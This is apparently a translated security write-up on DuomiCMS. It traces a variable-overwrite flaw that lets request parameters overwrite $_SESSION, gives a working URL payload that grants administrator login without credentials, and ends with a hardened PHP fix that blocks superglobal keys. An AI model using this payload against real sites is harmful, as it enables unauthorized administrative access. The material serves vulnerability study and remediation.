https://blog.csdn.net/weixin_43415644/article/details/94064059
https://www.cnblogs.com/Qiuzhiyu/p/11923471.html
First, look at index.php:
require_once ("duomiphp/common.php");
require_once duomi_INC."/core.class.php";
// site status
The variable-overwrite vulnerability is in duomiphp/common.php:
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}
All three sources, GET, POST and COOKIE, are accepted, and every key is registered as a global variable:
foreach($_REQUEST as $_k=>$_v)
{
if( strlen($_k)>0 && m_eregi('^(cfg_|GLOBALS)',$_k) && !isset($_COOKIE[$_k]) )
{
exit('Request var not allow!');
}
}
So a parameter is accepted as long as its name does not match ^(cfg_|GLOBALS) (and even a matching name passes when a cookie of the same name exists); no other names, _SESSION included, are blocked.
The function it calls only escapes the string:
function _RunMagicQuotes(&$svar)
{
if(!get_magic_quotes_gpc())
{
if( is_array($svar) )
{
foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
}
else
{
$svar = addslashes($svar);
}
}
return $svar;
}
get_magic_quotes_gpc: returns the current setting of the magic_quotes_gpc configuration option.
When magic_quotes_gpc=On, single quotes ('), double quotes ("), backslashes (\) and NUL (the NULL character) in input data are automatically prefixed with a backslash.
When magic_quotes_gpc=Off, the system does not add backslashes before those characters automatically, so addslashes() has to be called manually to escape the string.
Look at login.php:
require_once(dirname(__FILE__).'/../duomiphp/common.php');
require_once(duomi_INC."/check.admin.php");
Next, check.admin.php:
var $keepUserIDTag = "duomi_admin_id";
var $keepgroupidTag = "duomi_group_id";
var $keepUserNameTag = "duomi_admin_name";
// PHP 5 constructor
function __construct($admindir='')
{
global $admin_path;
if(isset($_SESSION[$this->keepUserIDTag]))
{
$this->userID = $_SESSION[$this->keepUserIDTag];
$this->groupid = $_SESSION[$this->keepgroupidTag];
$this->userName = $_SESSION[$this->keepUserNameTag];
}
To inject values into the session, session_start() must be called before $_SESSION is used; interface/comment.php does this before including common.php:
session_start();
require_once("../duomiphp/common.php");
require_once(duomi_INC.'/core.class.php');
To find which value to put into the session, search the codebase for groupid: admin_manager.php shows that it must equal 1 to get administrator rights.
function getManagerLevel($groupid)
{
if($groupid==1){
return "系统管理员"; // "system administrator"
}else if($groupid==2){
return "网站编辑员"; // "site editor"
}else{
return "未知类型"; // "unknown type"
}
}
interface/comment.php?_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_id]=1&_SESSION[duomi_admin_name]=admin
Then open the admin backend (/admin by default): you are logged in directly.
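As an added example (not DuomiCMS's own code), here is a hardened replacement for the request-registration loop in duomiphp/common.php: it rejects keys that name PHP superglobals and copies only declared parameters into an array instead of free-standing globals. The function names and the sample input are hypothetical.

```php
<?php
// Added example, not DuomiCMS code: a hardened replacement for the
// request-registration loop in duomiphp/common.php. Function names are
// hypothetical. Run with: php hardened_request.php

// Keys that must never be (re)defined from request data: the cfg_ / GLOBALS
// prefixes the original already rejects, plus every PHP superglobal name,
// since ${'_SESSION'} = ... at global scope overwrites $_SESSION itself.
function isForbiddenRequestKey(string $k): bool
{
    if (preg_match('/^(cfg_|GLOBALS)/i', $k) === 1) {
        return true;
    }
    $superglobals = ['GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                     '_SERVER', '_ENV', '_FILES', '_SESSION'];
    return in_array($k, $superglobals, true);
}

// Copy only declared parameter names, into a plain array instead of
// free-standing globals, so an unexpected key can never shadow an internal
// variable. Escaping/validation belongs at the point of use; addslashes()
// is not a defence against variable overwrite.
function collectRequestVars(array $allowed, array ...$sources): array
{
    $vars = [];
    foreach ($sources as $source) {
        foreach ($source as $k => $v) {
            if (!is_string($k) || isForbiddenRequestKey($k)) {
                // A superglobal name in a request is worth logging as an attack signal.
                error_log("rejected request key: $k");
                continue;
            }
            if (in_array($k, $allowed, true)) {
                $vars[$k] = $v;
            }
        }
    }
    return $vars;
}

// Constructed input mirroring the payload from the write-up above.
$_GET = ['_SESSION' => ['duomi_group_id' => '1'], 'page' => '2'];
$vars = collectRequestVars(['page', 'id'], $_GET, $_POST, $_COOKIE);
var_dump($vars);             // only the declared "page" key survives
var_dump(isset($_SESSION));  // the session array is left untouched
```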